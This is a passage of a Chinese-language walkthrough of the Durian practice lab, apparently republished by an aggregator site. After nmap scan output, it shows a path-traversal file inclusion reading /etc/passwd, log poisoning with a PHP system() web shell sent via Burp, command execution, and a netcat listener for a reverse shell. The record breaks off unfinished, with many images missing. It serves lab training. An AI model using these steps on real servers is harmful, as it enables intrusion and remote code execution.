HJhCswI5T79RSJVIrpRbR7g9h1vc+yDDu/SH49g5SGyE/e2YdDRuA/JVyMUKZFBt | wSErKwtEdoJosbega14/Vpe9uKIr |_-----END CERTIFICATE----- |_http-server-header: LiteSpeed |_ssl-date: TLS randomness does not represent time | tls-alpn: | h2 | spdy/3 | spdy/2 |_ http/1.1 8000/tcp open http syn-ack ttl 64 nginx 1.14.2 |_http-title: Durian |_http-open-proxy: Proxy might be redirecting requests | http-methods: |_ Supported Methods: GET HEAD |_http-server-header: nginx/1.14.2 8088/tcp open radan-http syn-ack ttl 64 LiteSpeed | fingerprint-strings: | GetRequest: | HTTP/1.0 200 OK | etag: "2fd-5f56ea13-40590;;;" | last-modified: Tue, 08 Sep 2020 02:18:59 GMT | content-type: text/html | content-length: 765 | accept-ranges: bytes | date: Wed, 14 Sep 2022 03:29:22 GMT | server: LiteSpeed | connection: close | <html> | <body bgcolor="white"> | <head> | <title>Durian</title> | <meta name="description" content="We Are Still Alive!"> | <meta name="keywords" content="Hacked by Ind_C0d3r"> | <meta name="robots" content="index, follow"> | <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> | <meta name="language" content="English"> | </head> | <link href="https://fonts.googleapis.com/css?family=Righteous|Saira+Stencil+One&display=swap" rel="stylesheet"> | <style type="text/css"> | @font-face { | font-family: 'Righteous', cursive; | font-family: 'Saira Stencil One', cursive; | </style> | <center><br><br> | <img src="https://www.producemarketguide.com/sites/default/files/Commoditi | Socks5: | HTTP/1.1 400 Bad Request | content-type: text/html | cache-control: private, no-cache, max-age=0 | pragma: no-cache | content-length: 1209 | date: Wed, 14 Sep 2022 03:29:22 GMT | server: LiteSpeed | connection: close | <!DOCTYPE html> | <html style="height:100%"> | <head> | <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> | <title> 400 Bad Request | </title></head> | <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"> | <div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> | style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1> | style="margin-top:20px;font-size: 30px;">Bad Request | </h2> | <p>It is not a valid request!</p> |_ </div></div><div style="color:#f0f0 |_http-title: Durian | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: LiteSpeed

??????? 10、查看192.168.174.138的/cgi-data目錄

????????

????????

??????? 查看當前源代碼

????????

??????? 測試一下文件包含

????????

??????? 查看源代碼

????????

??????? 能夠讀出數據，說明可以文件包含

??????? 11、查看192.168.174.157的7080端口的/docs文件

????????

??????? 12、回到 http://192.168.174.138/cgi-data/getImage.php?file=../../../../../../../../../../../etc/passwd

?????????這個網頁讀取/var/log/access.log

??????? 13、嘗試讀取網頁的/var/log/apache2/access.log，發現讀取不到任何內容，因此我們懷疑管理員將目錄做了變化

????????

??????? 14、用burpsuit抓取包

????????

????????

????????

????????

??????? 15、進入/var/log/durian.log/access.log路徑，進入成功

????????

??????? 這是訪問日志

??????? 16、使用burpsuit進行抓包

????????

????????

??????? 17、重新進入/var/log/durian.log/access.log，查詢日志記錄，發現我們剛剛的記錄

????????

??????? 18、

????????

??????? 將<?php system($_GET['x']);?>? //傳輸一個x值，讓他傳輸命令添加到burpsuit所抓取的數據包中,重新查看頁面中的內容。

????????

????????

????????<?php system($_GET['x']);?>作為php代碼被執行了所以只能下了x和y

??????? 19、添加 ls 命令進行查看

????????

·????????

??????? 再試試其他命令

????????

????????

??????? 我們已經完成了通過日志去上傳文件然后在靠文件包含進來

??????? 20、

????????

????????

????????

??????? kali對8888進行監聽

????????nc -lvvp 8888

????????? 發送剛剛修改的數據包

??????? 待續！！

???????

???????? ????

總結

以上是生活随笔為你收集整理的文件上传漏之Durian靶场练习——渗透day13的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。